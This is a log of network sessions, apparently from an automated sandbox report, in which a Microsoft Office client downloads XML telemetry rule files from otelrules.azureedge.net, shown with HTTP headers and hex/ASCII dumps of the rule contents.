Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.7	49803	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:48 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:48 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 8332a10a-c01e-0079-4304-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115948Z-r1cf579d778dndrdhC1EWR4b240000000200000000001akf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:48 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.7	49804	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:49 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:50 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: e8b3d2c0-701e-0050-0b05-486767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115950Z-r1cf579d778bb9vvhC1EWRs95400000001v00000000034bd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:50 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.7	49806	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:50 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:50 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 1dbd65e4-a01e-0002-7203-485074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115950Z-r1cf579d778xr2r4hC1EWRqvfs00000002e0000000000bmp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:50 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.7	49805	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:50 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:50 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: fdf3550d-a01e-0070-7703-48573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115950Z-r1cf579d77867vg8hC1EWR8knc000000024g000000002aex x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:50 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.7	49807	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:50 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:50 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:50 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: b8e80a8d-201e-000c-1e03-4879c4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115950Z-r1cf579d778t6txphC1EWRsd4400000002pg0000000045mk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:50 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.7	49808	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:50 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:51 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:50 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 555e9168-001e-0017-4603-480c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115950Z-r1cf579d7788pwqzhC1EWRrpd800000002p0000000000duf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:51 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.7	49809	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:52 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:52 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 18148ef3-001e-002b-2504-4899f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115952Z-r1cf579d778dndrdhC1EWR4b2400000001xg000000002nbf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:52 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.7	49811	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:52 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:52 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:52 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 42d07f15-f01e-0099-5306-489171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115952Z-r1cf579d778t5c2lhC1EWRce3w0000000320000000000ew6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:52 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.7	49810	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:52 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:52 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 0b61f7bb-f01e-0052-4103-489224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115952Z-r1cf579d7786c2tshC1EWRr1gc00000001w00000000038my x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:52 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.7	49812	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:52 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:52 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 7e532cc8-301e-000c-2603-48323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115952Z-r1cf579d778x776bhC1EWRdk8000000002600000000049aw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:52 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.7	49813	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:52 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:53 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:53 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: b9410fe1-901e-0015-5b03-48b284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115953Z-r1cf579d778g2t6ghC1EWRfggs00000001qg000000002khn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:53 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.7	49814	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:54 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:54 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:54 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 1dbd6d1b-a01e-0002-3903-485074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115954Z-r1cf579d778d5zkmhC1EWRk6h800000002tg000000001esu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:54 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.7	49815	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
